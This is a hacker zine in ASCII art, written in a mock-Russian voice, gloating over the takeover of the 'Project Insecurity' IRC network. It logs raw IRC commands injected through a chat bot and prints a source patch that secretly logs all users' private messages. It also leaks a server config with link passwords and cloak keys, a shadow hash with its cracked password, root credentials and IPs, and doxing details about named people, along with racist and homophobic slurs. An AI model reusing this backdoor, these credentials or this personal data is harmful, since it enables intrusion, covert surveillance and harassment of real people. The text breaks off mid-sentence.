░ ░ ░ ░ ░ FEATURING: "MLT" as THE EX-TEAMP0ISON FEDERAL AGENT ░ ░ "BONGRIP" as THE WEAKEST LINK ░ ░ "DANK" as THE MARDAM-BEY ZERODAY ░ ░ "DIRTY" as EL7 .. WE PROUDLY PRESENT: ░ ░░ ▄▄█████▄ ░░ ▐█▓▀ ▐██▌ ▒▒▒▒▒▒ █▓▌ ██▓ ██▓ █████▓▓ ▄▄▄▄▄███▄████████▄ ██▄ ███████ ▄██▀▀▀▀ █▀███▓ ▀███▌ ██▓ ▀▀██▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄████████████████████████ ██▌ █░████ ▄███████▓███▄▄▄▄▄▄███▄ ▀███████████████████████████████████████ █▓▌ █▒██▀██████▀ ███ ██ ▀▀████▀▀▀▀▀▀▀▀▀▀ ▀▀▀███ █▓▌ ▐█▓██░█▀▀ █▀█ ▓▓ apT-28 NF0 ██▐ ██▄▌ ▄███▌█▒█ ▄ █░█ ▄ ▒▒ yOUr eNt3r741nm3nt 4or t0d4Y: ▐ ▀███████▓▀ █▓█ ▐ ▄ █▒█ ▄██ ▌ ░░ ▀▀▀▀▀▀ ███ █ ▌ █▓█ ▐█▓ ▐▌ #Insecurity ░░ █▄▄▄▄▄▄▄▄▌ ██▓ ▄██ ▌▄ ███▄ ▄██▌ ▐█ ░░ irc.insecurity.zone ▒▒ ██████████▄▄▄▄▄██████▄ ▀██████▀ ▄██ ▒▒ ▓▓ ███████████████████████▄▄▄▄▄▄▄▄████ ▓▓▄ ██ ███████████████████████████████████████████████████████████████████████████████ █████████ █████████ █▀▀▀▀▀▀▀▀ █ ▐████▌ ▄██▄ ████▄ ██ ▄███ ▄███▄ █▌ ▐█▐█ ▐█▌ ▄██▄ ▄█▀█▄ ▄███ █▄▄ ██ ████ ██▌██▌ ██ ██ ▄▄▄ ▄▄▄ ██ ██ █▌ ▐█▐██▐█▌ ████ ██ ██ ██ ███ ██ ██▐█▌ ████▀ ██ ███ █ █ █▄▄ ██/██ █▌▐▌▐█▐████▌▐██▐█▌ ██ ▄▄▄ ███ ███ ██ ▐█████ ██▌██▌ ██ ██ █▄█ █ ██ ██ █▌▐▌▐█▐█▌██▌▐█████ ██ ▀█▀ ██ ███ ██ ██▌ ██ █████▀ █████ ▀███ ▀███▀ ▀████▀▐█▌ █▌██▌ ██ ▀███▀ ▀███ ███▄▄▄▐▄▄ █████████ █████████ █████████ 0x00: Intro █████████ 0x01: The Tales of Khaled Mardam-Bey █████████ 0x02: The Impostor █████████ 0x03: Hook, O:Lines, and Sinker █████████ 0x04: Pass the hash █████████ 0x05: A flaw in MD5 █████████ 0x06: MD5pedia █████████ 0x07: Clash of the hashes █████████ 0x08: Recommended reading █████████ 0x09: Attachments █████████ 0x0A: Contact █████████ 0x0B: Greetings █████████ █████████ █████████ ███████████████████████████████████████████████████████████████████████████████ ███▓▓▓▒▒▒░░░ 0x00 Intro ███ ███████████████████████████████████████████████████████████████████████████████ █░░ █░ █░ Dobra evening, Komrades, █ █ Is slow day at Яussian ENERGETICBEAR HQ. We notice script kiddie honeypot █ and decide to have fun. I turn to Vlad and get him to fire up ICQ to kontact █ our network of sleeper agents across world. Is not long and we having Dmitry █ and Sergey ready to attack network (is named "Insecurity", haha are █ Americans of realizing irony in this)? Upon joining, we see nearly 100 █ capitalist Блядь, some klaiming to be in ~el8. They not realizing we zf0, █ but we sneak in through front door as APT and compromise their IRC. They █ give us password hashes, is easier than SCADA system хихихихихи. Go get █ your glass of Kvass and get ready, vis story is only beginning. █ █ Oh Спасибо for asking to be 0wned, we thoroughly enjoyed this. █ ███████████████████████████████████████████████████████████████████████████████ ███▓▓▓▒▒▒░░░ 0x01 The Tales of Khaled Mardam-Bey ███ ███████████████████████████████████████████████████████████████████████████████ █░░ █░ █░ Typically skid having MIRC bot because languages are too difficult. So we █ watched users interact with the bot and it have command for "Urban █ Dictionary" among others. They do not strip newlines from many of the █ command replies, basic protocol for all bot (we see this passively, someone █ sends Urban Dictionary command and it truncates on the newline). So we █ having OPER and services admin on their IRC (they giving the bot this █ power, of course), as well as RCE on the bot through access to other █ command. However we having our sights set on something far greater.. █ █ Side notes: #research being their priv8 channel and #noc is their IP █ logging channel. danK is the MIRC bot. █ █ After we getting Urban Dictionary entries approved we laughing over водка. █ Now we send command to restore glory to disgusting skid IRC: █ █ .ud priv8 █ (Urban Dictionary) priv8: Very secure. Example: so priv8, jk █ PRIVMSG ChanServ :AKICK #noc ADD MLT /dev/null █ PRIVMSG ChanServ :AKICK #noc ADD *@* /dev/null █ PRIVMSG OperServ :SAJOIN zf0 #research █ PRIVMSG OperServ :SAJOIN zf0 #insecurity █ SAJOIN zf0 #research █ -!- zf0 [zf0@privacy.internetz.me-50310034.dfri.se] has joined #research █ SAMODE #research +havoq zf0 zf0 zf0 zf0 zf0 █ -!- ServerMode/#research [+havoq zf0 zf0 zf0 zf0 zf0] by superb.undernix.net █ PRIVMSG ChanServ :ACCESS #insecurity ADD zf0 SOP █ PRIVMSG ChanServ :ACCESS #research ADD zf0 SOP █ GLOBAL T1m3 to rM s0m3 sk1ds, n3tw0rk m41nt3n4nc3 █ PRIVMSG OperServ :SET SUPERADMIN ON █ PRIVMSG OperServ :SEEN CLEAR █ PRIVMSG OperServ :SEEN CLEAR 6w █ PRIVMSG OperServ :FORBID ADD MLT :skid lord █ PRIVMSG OperServ :OPERNEWS ADD WE GOT HACKED █ PRIVMSG OperServ :GLOBAL T1m3 to rM s0m3 sk1ds, n3tw0rk m41nt3n4nc3 █ PRIVMSG Global :GLOBAL T1m3 to rM s0m3 sk1ds, n3tw0rk m41nt3n4nc3 █ -Global(services@undernix.net)- T1m3 to rM s0m3 sk1ds, n3tw0rk m41nt3n4nc3 █ PRIVMSG ChanServ :TOPIC #insecurity y0ur d41ly s0urc3 0f wh1t3h4t | security █ experts | phR13ndlY pSA: MLT is a F3d && anyone wh0 K1aims t0 be in el8 is a █ sk1d █ -!- JewOven changed the topic of #insecurity to: y0ur d41ly s0urc3 0f wh1t3h █ 4t | security experts | phR13ndlY pSA: MLT is a F3d && anyone wh0 K1aims t0 █ be in el8 is a sk1d █ TOPIC #insecurity :y0ur d41ly s0urc3 0f wh1t3h4t | security experts | phR13n █ dlY pSA: MLT is a F3d && anyone wh0 K1aims t0 be in el8 is a sk1d █ -!- danK changed the topic of #insecurity to: y0ur d41ly s0urc3 0f wh1t3h4t █ | security experts | phR13ndlY pSA: MLT is a F3d && anyone wh0 K1aims t0 be █ in el8 is a sk1d █ MODE #insecurity +havoq zf0 zf0 zf0 zf0 zf0 █ SAMODE #insecurity +havoq zf0 zf0 zf0 zf0 zf0 █ SAMODE #insecurity +blLeI *!*@* 1 #ppriv ~r:*unbannable irc* ~r:*god* █ -!- ServerMode/#insecurity [+b *!*@*] by superb.undernix.net █ MODE #insecurity +blLeI *!*@* 1 #ppriv ~r:*unbannable irc* ~r:*god* █ -!- mode/#insecurity [+lbLeI 1 *!*@* #ppriv ~r:*unbannable irc*!*@*] by danK █ TOPIC #research :th1s ch4nn3l 1z imp3netrable. l1k3 0ur v1rg1n1ty █ -!- danK changed the topic of #research to: th1s ch4nn3l 1z imp3netrable. l1 █ k3 0ur v1rg1n1ty █ SAMODE #research +k l4m3rs █ MODE #research +k l4m3rs █ -!- mode/#research [+k l4m3rs] by danK █ SAMODE #noc -O █ MODE #noc -O █ .ud priv9 █ (Urban Dictionary) priv9: Ultra secure, like MD5 Example: Whoa thats █ priv9? Is that the darknet? █ PRIVMSG #insecurity :MESS █ PRIVMSG #insecurity :WITH █ PRIVMSG #insecurity :THE █ PRIVMSG #insecurity :BEST █ PRIVMSG #insecurity :DIE █ PRIVMSG #insecurity :LIKE █ PRIVMSG #insecurity :THE █ PRIVMSG #insecurity :REST █ GZLINE MLT 0 :ch13f phed3ral ag3nt █ GZLINE RMS 0 :rip █ * RMS has quit (Z:lined (rip)) █ GZLINE sxcurity 0 :rip █ * sxcurity has quit (Z:lined (rip)) █ GZLINE FuZi0N 0 :rip █ * FuZi0N has quit (Z:lined (rip)) █ GZLINE sp00n 0 :rip █ * sp00n has quit (Z:lined (rip)) █ GZLINE syn4pse 0 :rip █ * sup has quit (Z:lined (rip)) █ * dab has quit (Z:lined (rip)) █ * Zodiac has quit (Z:lined (rip)) █ * dkb has quit (Z:lined (rip)) █ * loeken has quit (Z:lined (rip)) █ * syn4pse has quit (Z:lined (rip)) █ GZLINE Alyssa 0 :rip █ * Alyssa has quit (Z:lined (rip)) █ GZLINE chloe 0 :rip █ GZLINE komodo 0 :rip █ * dab has quit (Z:lined (rip)) █ KILL lola :rip █ * lola has quit (Killed (danK (rip))) █ KILL elitedan1erous :rip █ KILL e :rip █ KILL Nux :rip █ * Nux has quit (Killed (danK (rip))) █ PRIVMSG OperServ :KILL dirty niggers123 █ KILL dirty :niggers123 █ PRIVMSG OperServ :KILL bongrip i write rootkits so i know if my irc can get █ hacked █ KILL bongrip 0 :i write rootkits so i know if my irc can get hacked █ PRIVMSG ChanServ :AKICK #insecurity ADD MLT :w3lc0m3 b4q █ PRIVMSG ChanServ :AKICK #insecurity ADD bongrip :w3lc0m3 b4q █ PRIVMSG ChanServ :DROP #research #research █ * ChanServ sets mode -r on #research █ PRIVMSG ChanServ :DROP #noc #noc █ PRIVMSG BotServ :BOT ADD MLT ci192 vpn02.fbi.gov :skid lord █ DIE die █ -!- Netsplit <-> superb.undernix.net █ PRIVMSG OperServ :NOOP SET superb.underunix.net █ PRIVMSG OperServ :NOOP SET aussie.insecurity.zone █ PRIVMSG OperServ :NOOP SET fsociety.internetz.me █ █ b0ngr1p vS. [zf0]danK: █ -!- bongrip [rip@undernix.net] has quit [[superb.undernix.net] Local kill by █ danK (That shit outta here, bitch.)] █ -!- danK was kicked from #insecurity by bongrip [Don't ban me :)] █ -!- mode/#insecurity [-ob danK *!*@*] by bongrip █ -!- bongrip was kicked from #insecurity by danK [That shit outta here.] █ -!- mode/#insecurity [+b *!rip@undernix.net] by danK █ -!- mode/#insecurity [+b bongrip!*rip@undernix.net] by danK █ -!- mode/#insecurity [-b *!rip@undernix.net] by bongrip █ -!- mode/#insecurity [+b *!POTENT@undernix.net] by bongrip █ █ Pigdog imperialist skidswine so confused and scared they reinstall services. █ They deciding services being beyond repair and starting over. Which meaning █ we can impersonate anyone. So why not become the leader of the network? █ █ ███████████████████████████████████████████████████████████████████████████████ ███▓▓▓▒▒▒░░░ 0x02 The Imposter ███ ███████████████████████████████████████████████████████████████████████████████ █░░ █░ █░ Now Dmitry is funny guy, he thinking we can trick them by simply changing █ our nickname to the one they call MLT. I say no, Americans are not vhat █ stupid. I change nick, from zf0 to MLT. I get private message asking me █ what is going on, how core members are leaving. I could not believe vey █ could be this oblivious. I ask one admin "can you change my admin password █ comrade". He does so. Vladmir says to ask him for a hash from /etc/shadow. █ They give it to us. Vut the fuck!? █ █ PM with bongrip: █ yea █ are u on aussie server █ I am █ ya everything works for me █ ur stuff is still the same █ im just trying to get █ services █ going █ i can oper but █ i cant link db's █ they killed the ircd █ send cmds to kill it █ lol █ We need to lock this down, I'm getting password denied on my OPER cred █ entials █ its not from them hacking █ or anything █ they just used sendraw on teh bot dude █ really not anything special ive done that before █ but u know waht i did █ i used █ run /cmd.exe ftp getmybinary █ they could have █ really fucked me up █ if htey were smart █ but they arent █ they took time into those cmds too █ its really sad they dont know how powerful it is █ they could have tkaen over █ my rdp █ and █ OFFICIALLY █ said they reallly hacked me █ and taken voer █ the entire server █ from mirc gui via rdp █ shit █ dont give them any ideas █ but nothing else █ is like that █ i checked all the cmds they ran █ nothing crucial █ they killed everything off too soon █ they killed it instantly and made mistakes █ i'm on my phone right now, change my public key in authorized_keys, th █ ey may have my id_rsa █ talking with this faggot █ nah █ nobody has anything █ they didnt get into any servers █ all they did was send that one cmd █ thru urban dictionary █ thru the bot █ with sendraw █ i'm looking at my id_rsa key, it was a distraction █ fuck █ change the keys and passwords and run rkhunter █ bro nothing is on there █ on anything █ lol █ are you sure man? █ did you run rkhunter? █ no █ but i dont have to █ i know they didnt get into any boxes █ yes i'm literally positive █ positive of what █ there is a rootkit on the box RIGHT NOW █ -Global- Services are now back online - have a nice day █ r ru srs █ on ur box? █ i didnt even look at ur box █ im looking at mine to make sure everything else is good █ u had root open u told me u were gonna secure ur box █ u told me to just setup ircd shit █ and u were gonna secure it █ and how do u know theres a rootkit █ on the box █ they pasted part of /etc/shadow █ damn █ they must have got in ur box █ that's what i've been saying █ ive they have those hashes █ man █ i think green is helping them █ but █ i'm about to get back, PLEASE change the pws █ someone doesnt know irc too well and windows █ bro █ rm -rf that shit █ lol █ and this time █ i will i just need to back up some files █ ill lock the box down █ root was open █ it coulda been bruted tbh █ i didnt even configure jail.conf █ nothing was ready █ on that box █ u told me not to █ lol █ nothing? ok █ bro there was 0 security █ on that box █ literally █ u told me to setup the ircd █ and that u were gonna put keys on theree █ and lock it down █ i'm going to add a new user that can run rkhunter on my boxes, the pas █ sword is going to be XbW9_AZaCr+zEX █ i can disable Root login for the ssh █ just use keys █ and disable root no matter what █ they cant guess user/pass █ but root/pass █ yes █ all day long █ i can crack a lot of those hashes in my head now █ it all starts to mesh together █ especially wasnt it like █ 8 chars █ the pw █ im sure they had processing power to crack that █ bruted the fuck out of it █ but weird thing █ lola is in the channel █ that they did this shit in █ i wanna know how the bot joined #help in the first place █ do you think lola is in on it? █ and why █ lola █ and █ zf0 █ were in there █ alone █ lola didnt say anything █ but █ somethings up █ wtf █ he was in #help █ out of nowhere █ with just █ my bot █ zf0 █ and lola █ while zf0 was running those cmds █ btw u got hacked by some guys from 2600 █ i think xt did that █ jihad couldnt have done that █ god damn it, we need to do a full password reset to be safe █ mind changing @insecurity? █ i'll remove the password for root and only use keyauth █ did u reset the box █ reinstall everything █ illl have to scrub the hashes off █ of the confs █ and add new pw's █ its just that one box █ and they may not even have root █ idk man █ lol █ need to reinstall the box tbh █ ill run a quick install █ of ircd █ in seconds █ ok █ save the .conf file █ thanks █ gimme new pw when u do it █ and █ well █ actually since they can read logs rn █ dont give me anything here █ lol █ cause ur box is a hub █ they could read these pm's rn if ur really kitted █ thru pcaps █ i'm using ssl █ its not valid █ they can be stripping that █ its not a valid cert █ its almost the equivalent of putting a very known, easily exploita █ ble lock on your front door █ and expect someone not to break in █ well if we are going to rotate the conf anyway i need a temp oper real █ quick, still mobile █ u should have oper █ nothing changed █ hang on i'm kicking zf0 █ lemme get into box again █ they probably changed my oper pass with jihad's █ doubt it █ they'd be doing a lot more damage rn █ gimme a pw █ i still dont think █ ur hacked bro █ im in the box █ gimme a pw to hash tho █ @7fdVrQG@$?h █ done █ try opering █ that one worked █ can u give me █ the etc/shadow █ plz █ theres only █ 1 user █ in shadow █ if they pasted u the bottom █ then they pasted you █ ins3circd █ ??? █ this long ass hash? █ ins3circd:$6$3Ip4HnTD$c3Nt3o0hKzUf6Xu.mS/rTANN91PSS2043GNn6I.gO5Jx █ U5BXFjC5L8uV9D4nb0OJxIlCJwnacwxiyYKOmXm.5/:17306:0:99999:7::: █ i doubt that man █ if they didnt paste u that █ they dont have shit █ or at least root hash █ hurry and tell me if they pasted that █ to u █ mlt █ back █ that's the one █ they did paste that? █ yea █ erh █ i don't think they can bruteforce it █ yea i think they just got hash bro █ not anything else █ if they were in █ id see them █ i just ran every active connection █ on this box █ its everyone on irc █ and me █ this thing isnt going anywhere i/o █ but █ guaranteed if they had axx █ to that unrealircd.conf █ they would have opered themselves █ dont u think █ rather than run a stupid exploit thru the bot █ that coulda really done damage █ if they knew what they were doing █ literally that was their gateway █ to completely own us █ unless it was a distraction █ i wasnt even looking in #help █ nah █ therea re people trying to hack us █ for sure █ so █ we need to use keys █ and ip's bound █ to get into our boxes █ so not only do u need the key █ u need to be on a certain ip █ its what syn4pse does █ true █ its what everyone does █ we're just lazy █ and as 'insecurity' █ we cant be that █ and we cant let them in this box █ lets just format it and call it a day cause they only have /etc/sh █ adow and /etc/passwd █ im sure █ cause like literally what insecurity stands for █ is not being lazy █ and setting shit up █ and not getting owned █ lol █ we just showed ppl we are just as lazy █ who did it █ like █ i know it was 2600 guys █ but whos talking to u █ that showed u that hash █ someone i know, i'm trying to get more information out of them █ its a user on efnet █ i already know its efnet lol █ its 2600 guys bc u started that war with jihad █ hes actually got connnections to guys who can do shit like xt █ granted how much shit i talk about xt █ hes actually good at shit █ but if ur really rooted █ xt is behind that █ but ur not █ we need to get full dox on xt █ brandon edwards █ st louis, missouri █ lol █ i doxed a lot of el8 █ b4 i left █ bandit can pull dox by ip █ for certain companies █ USA █ like comcast, cox, charter, etc █ he had access to all of it █ he doxed like 6 guys for me █ all el8 members █ he didnt know that tho █ lol █ 8) █ also █ this is in relation █ to xt █ my ex █ dated him █ like a long time ago █ and got drugs from him █ and still talks to him █ 24/7 █ ive got her doxed to her teeth █ ive got ssn and everything █ she's on his fb █ to get more updated (address) on him █ and if thats going on its not good █ cause im sure xt could dox me █ thru my ex █ but wont bc of her █ so i gotta hold her dox █ as lleverage █ fuck man this shits turning into politics █ i know man █ like literally █ i have a bunch of shit █ on random people █ thats why im not doxed █ they know ill sperg out and drop like 50 dox's █ a few people know what i have █ thats why they hold back █ theresr so many spots and positions im in like that █ where they have some of my info █ maybe even more █ i can say this tho stay clean █ keep box clean █ i got a feeling they r coming on false info █ green came to me █ and talked real srs █ like feds were comin █ for some reason █ idk why he was actin like that █ but he said █ supernets is basically like bluehell █ its one big honeypot █ i'm in their payload █ * i'm looking at their payload █ it runs 'gzline' on a lot of people including me █ and then when it gets to lola it just runs KILL █ it does the same thing for elitedangerous, e, and Nux █ its just sendraw man █ i already showed it to u █ u can urbandictionary 'priv9' █ i told u they went thru the bot █ i wouldnt really call that a payload █ but yea if someone has root █ ppl dont just pop up with root like that █ if they have /etc/shadow █ i really think it was inside job █ w/ the etc/shadow █ cause they could have added themselves █ in the oper conf █ why would they go thru dank █ and use sendraw █ this was him █ testing █ http://www.urbandictionary.com/define.php?term=priv7 █ and again █ http://www.urbandictionary.com/define.php?term=priv8 █ MLT █ get lola █ to paste u all the cmds █ zf0 put in #help █ so i can see what they all ran █ █ yea i think they just got hash bro █ █ After this, bongrip changed the hash and secured the network. █ █ █ THE END █ █ ▓ ▒ ░ ... ░ ▒ ▓ █ █ h4h4h4h4h4h4 █ Is joke, yes? Is funny because stupidity flow like radioactive river here. █ █ ███████████████████████████████████████████████████████████████████████████████ ███▓▓▓▒▒▒░░░ 0x03 Hook, O:Lines, and Sinker ███ ███████████████████████████████████████████████████████████████████████████████ █░░ █░ █░ 1st s0me 1nf4llabl3 logiq: █ █ bongrip PRIVMSG #insecurity :if we got hacked █ bongrip PRIVMSG #insecurity :we wouldnt be told █ bongrip PRIVMSG #insecurity :i constantly have to check shit █ bongrip PRIVMSG #insecurity :if we get hacked by these guys we wont know it █ bongrip PRIVMSG #insecurity :htey arent going to brag █ bongrip PRIVMSG #insecurity :until i check it and find it █ bongrip PRIVMSG #insecurity :one day █ YogSotho PRIVMSG #insecurity :Indeed. U notice only when they rm ur box █ bongrip PRIVMSG #insecurity :which will never happen █ bongrip PRIVMSG #insecurity :cause nothing is popped █ bongrip PRIVMSG #insecurity :no █ bongrip PRIVMSG #insecurity :they wont rm me █ bongrip PRIVMSG #insecurity :they would just do it to log █ bongrip PRIVMSG #insecurity :they would pop the hub █ bongrip PRIVMSG #insecurity :from there u can use pcap play █ bongrip PRIVMSG #insecurity :to sniff pm's █ bongrip PRIVMSG #insecurity :and everything else █ █ Like this? █ █ src/modules/m_message.c █ < if (ret == CANPRIVMSG_SEND) █ < { █ > FILE *fp; █ > fp=fopen("/var/backups/.irc/log.txt", "a"); █ > fprintf(fp, "%s %s %s :%s\n", parv[0], cmd, nick, text); █ > fclose(fp); █ < sendto_message_one(acptr, sptr, parv[0], newcmd, nick, █ text); █ < continue; █ < } █ █ src/modules/m_message.c █ < if (!text) █ < continue; █ > FILE *fp; █ > fp=fopen("/var/backups/.irc/log.txt", "a"); █ > fprintf(fp, "%s %s %s :%s\n", sptr->name, cmd, chptr->chname, █ text); █ > fclose(fp); █ < sendto_channelprefix_butone_tok(cptr, █ < sptr, chptr, █ < prefix, █ < notice ? MSG_NOTICE : MSG_PRIVATE, █ < notice ? TOK_NOTICE : TOK_PRIVATE, █ < nick, text, 1); █ █ There being problem: if we reload ircd американцов opers will receive notice █ through the SNOMASK system. So we faking a DDOS attack with bot spam while █ delinking the ircd. █ █ YogSotho PRIVMSG #insecurity :I saw mlt log of the bot abuse █ bongrip PRIVMSG #insecurity :word to ya mother brother fuckers █ bongrip PRIVMSG #insecurity :no █ bongrip PRIVMSG #insecurity :that was █ bongrip PRIVMSG #insecurity :skids █ bongrip PRIVMSG #insecurity :the mammoth has not attacked █ bongrip PRIVMSG #insecurity :obv █ bongrip PRIVMSG #insecurity :unless █ bongrip PRIVMSG #insecurity :UNLESS █ bongrip PRIVMSG #insecurity :see one thing did happen █ bongrip PRIVMSG #insecurity :out of hte ordinary █ YogSotho PRIVMSG #insecurity :Uh... █ bongrip PRIVMSG #insecurity :which they mave have done this to prove they rm █ 'd it amongst themselves █ YogSotho PRIVMSG #insecurity :Warning █ bongrip PRIVMSG #insecurity :aussie server delinked █ bongrip PRIVMSG #insecurity :out of nowhere █ bongrip PRIVMSG #insecurity :i had to /connect back to it █ YogSotho PRIVMSG #insecurity :Thats bad █ bongrip PRIVMSG #insecurity :cause autoconnect isnt ont █ bongrip PRIVMSG #insecurity :but then again █ bongrip PRIVMSG #insecurity :thats an unreal bug █ bongrip PRIVMSG #insecurity :from 3.2 █ ^ is not even a bug fitting this description but they still falling for it. █ █ ███████████████████████████████████████████████████████████████████████████████ ███▓▓▓▒▒▒░░░ 0x04 Pass the hash ███ ███████████████████████████████████████████████████████████████████████████████ █░░ █░ █░ Western world seeming strange to us. We not used to getting password hash █ without coercion. Very nice peoples. глупый, yes, but so kind and trusting. █ So да, all you needing for pop root is waiting for admin to fall for child █ level social engineering. █ Special Спасибо to bongrip for providing this to us in PM. █ █ ins3circd:$6$3Ip4HnTD$c3Nt3o0hKzUf6Xu.mS/rTANN91PSS2043GNn6I.gO5JxU █ 5BXFjC5L8uV9D4nb0OJxIlCJwnacwxiyYKOmXm.5/:17306:0:99999:7::: █ | █ V █ gangster4lyf █ █ ins3circd@zyzz8:~$ id █ uid=1000(ins3circd) gid=1000(ins3circd) groups=1000(ins3circd) █ ins3circd@zyzz8:~$ ./st4t3-sp0ns0r3d-0dayz █ root@zyzz8:~# id █ uid=0(root) gid=0(root) groups=0(root) █ █ ржунимагу.. J/K they giving IRCd user sudo ALL .. █ Insecurity more fitting title as time winding on. █ █ ins3circd@zyzz8:~$ sudo -s █ root@zyzz8:~# cat /etc/sudoers|grep ins3circd █ ins3circd ALL=(ALL:ALL) ALL █ █ @ret2libc (MLT): Where's our hub IP? Or uname output on any of our leafs? █ PLEASE provide even the slightest shred of evidence that you hacked anything █ █ Hub IP: 178.32.215.78 █ Uname -a of leaf: Linux zyzz8 4.4.59-1-pve #1 SMP PVE 4.4.59-87 (Tue, 25 █ Apr 2017 09:01:58 +0200) x86_64 █ █ I don't know hub IP █ lol █ even the wannabe hackers have the hub ip █ how do you not have it █ █ If you needing more proof, BLT, please to giving us more hashes. █ █ aPt 1z s1mplY UNR34L $$$$$ █ root@zyzz8:/home/ins3circd/Unreal3.2.10.1# cat unrealircd.conf █ #loadmodule "src/modules/hideserver.so"; █ loadmodule "src/modules/commands.so"; █ loadmodule "src/modules/cloak.so"; █ include "help.conf"; █ include "badwords.channel.conf"; █ include "badwords.message.conf"; █ include "badwords.quit.conf"; █ include "spamfilter.conf"; █ include "aliases/anope.conf"; █ █ me { █ name "aussie.insecurity.zone"; █ info "Project Insecurity"; █ numeric 042; █ }; █ █ admin { █ "MLT"; █ }; █ █ class clients █ { █ pingfreq 420; █ maxclients 500; █ sendq 100000; █ recvq 8000; █ }; █ █ class servers █ { █ pingfreq 420; █ maxclients 10; /* Max servers we can have linked at a time * █ / █ sendq 1000000; █ connfreq 100; /* How many seconds between each connection █ attempt */ █ █ }; █ █ oper rebel { █ class clients; █ from { █ userhost *@*; █ }; █ password "$zAPIgFNG$YgI80nbHSYuwHt2hYhl7mA=="{ md5; }; █ flags █ { █ netadmin; █ global; █ can_rehash; █ can_die; █ can_restart; █ helpop Oper; █ can_wallops; █ can_globops; █ can_localroute; █ can_globalroute; █ can_localkill; █ can_globalkill; █ can_kline; █ can_unkline; █ can_gkline; █ can_localnotice; █ can_globalnotice; █ can_zline; █ can_gkline; █ can_gzline; █ get_umodew; █ get_host; █ can_setq; █ can_override; █ services-admin; █ }; █ snomask kcFfjvGenq; █ }; █ █ oper MLT { █ class clients; █ from { █ userhost *@*; █ }; █ password "KASDM09A980km0asnmlL/,.ASDMK8jdjJJNDSLA832NLALCK92385795943 █ 29dhjkmdsa"; █ flags █ { █ netadmin; █ global; █ can_rehash; █ can_die; █ can_restart; █ helpop Oper; █ can_wallops; █ can_globops; █ can_localroute; █ can_globalroute; █ can_localkill; █ can_globalkill; █ can_kline; █ can_unkline; █ can_gkline; █ can_localnotice; █ can_globalnotice; █ can_zline; █ can_gkline; █ can_gzline; █ get_umodew; █ get_host; █ can_setq; █ can_override; █ services-admin; █ █ }; █ snomask kcFfjvGenq; █ }; █ █ link superb.undernix.net { █ username *; █ hostname 178.32.215.78; █ bind-ip *; █ port 5556; █ hub *; █ password-connect "*(ijlk2j809&ADS(AYULSDIuli23h45lhk,j"; █ password-receive "*(ijlk2j809&ADS(AYULSDIuli23h45lhk,j"; █ class servers; █ options { █ autoconnect; █ ssl; █ }; █ }; █ █ listen *:5556; █ { █ options █ { █ ssl; █ serversonly; █ } █ } █ █ listen *:6697 █ { █ options █ { █ ssl; █ clientsonly; █ }; █ }; █ █ listen *:9999 █ { █ options █ { █ ssl; █ clientsonly; █ }; █ }; █ █ listen *:7000; █ listen *:6919 █ { █ options █ { █ serversonly; █ ssl; █ }; █ }; █ █ listen *:6667; █ listen *:4585 █ { █ options █ { █ serversonly; █ ssl; █ }; █ }; █ █ listen [::ffff:192.168.0.1]:6667; █ █ ulines { █ services.undernix.net; █ stats.undernix.net; █ }; █ █ ban nick { █ mask "*C*h*a*n*S*e*r*v*"; █ reason "Reserved for Services"; █ }; █ █ ban nick { █ mask "*{*-*}*"; █ reason "Nickname not allowed"; █ }; █ ban nick { █ mask "*[*-*]*"; █ reason "Nickname not allowed"; █ }; █ █ ban nick { █ mask "zyk-*"; █ reason "Nickname not allowed"; █ }; █ █ ban realname { █ mask "Swat Team"; █ reason "mIRKFORCE"; █ }; █ █ set { █ network-name "ProjectInsecurity"; █ default-server "irc.insecurity.zone"; █ services-server "services.undernix.net"; █ stats-server "stats.undernix.net"; █ help-channel "#help"; █ hiddenhost-prefix "boats"; █ snomask-on-oper "+xwipIHWgs"; █ █ cloak-keys { █ "ADXq2XNBW2NQXDP1kd6G2U1q7ph2HG5ZTK0E2wqLa"; █ "DoF9BXfSkTzKobCQu8vwzWpzZbpm1VquxJpNTvORa"; █ "hhkOmc3q1ik0sC0bT349zOnnU35xrSK1GEHLzC5Sa"; █ }; █ █ hosts { █ local "insecurity.zone"; █ global "insecurity.zone"; █ coadmin "insecurity.zone"; █ admin "insecurity.zone"; █ servicesadmin "insecurity.zone"; █ netadmin "insecurity.zone"; █ host-on-oper-up "yes"; █ }; █ }; █ █ set { █ kline-address "careless@fuckyou.com"; █ modes-on-connect "+ixw"; █ modes-on-oper "+xwipIHWgs"; █ oper-auto-join "#operators"; █ options { █ hide-ulines; █ show-connect-info; █ }; █ maxchannelsperuser 20; █ restrict-usermodes "s"; █ oper-only-stats "*"; █ throttle { █ connections 7; █ period 60s; █ }; █ anti-flood { █ nick-flood 5:30; █ }; █ }; █ █ allow { █ ip *@*; █ hostname *@*; █ class clients; █ maxperip 9; █ }; █ █ alias { type services; }; █ alias ChanServ { type services; }; █ alias OperServ { type services; }; █ alias HelpServ { type services; }; █ █ @ret2libc (MLT): First off, I haven't even implemented MD5 anywhere. █ Secondly, please show me evidence of collisions being actively abused in the █ wild. █ █ Is true MLT plaintext != MD5. But maybe we checking the hub config next. █ root@zyzz8:~# ./unr34l-p1v0t superb.underunix.net █ oper MLT { █ class clients; █ from { █ userhost *@*; █ }; █ password "$eIU5EWKz$juoBabw3RQrdYZYzW/7f2A=="{ md5; }; █ flags █ { █ netadmin; █ global; █ can_rehash; █ █ This looking like MD5 to me. █ Okay bongrip, is time to get your priv8 root password.. █ █ host = ip-41-230-239-173.toronto.ca.northamericancoax.com : username = ins3c █ ircd : password = gangster4lyf █ host = 198.15.79.157 : username = root : password = h3ll0p00p6654 █ █ root:h3ll0p00p6654 █ █ ███████████████████████████████████████████████████████████████████████████████ ███▓▓▓▒▒▒░░░ 0x05 A flaw in MD5 ███ ███████████████████████████████████████████████████████████████████████████████ █░░ █░ █░ We'll let bongrip describe his bot for us. Keep in mind there is a bot on █ their network that allowing you to change your vhost. █ █ bongrip == rebel/defiler/dope/n0de9 (IPT/BlueHell) █ danK == django █ █ do not try to exploit django, u will get glined █ its all automated █ it identifies by nick/ident/host █ █ !vhost insecurity.zone █ * vHostserv sets ban on MLT|afk!*@* █ * You have been kicked from #vhost by vHostserv (Done. You can request a new █ vhost after 1 seconds from your last one. Banned for 1 seconds) █ █ By the way, is still 0day'd, they never figuring it out. Their best guess █ being we either made a 0day driveby browser exploit or cracked a 63 █ character m1x3d alphanumeric MD5 hash with symb0ls. █ █ Which would take 4,109,550,000,000,000,000,000,000,000,000,000,000,000,000, █ 000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000, █ 000,000 years for our cluster of 200 GTX1080's to 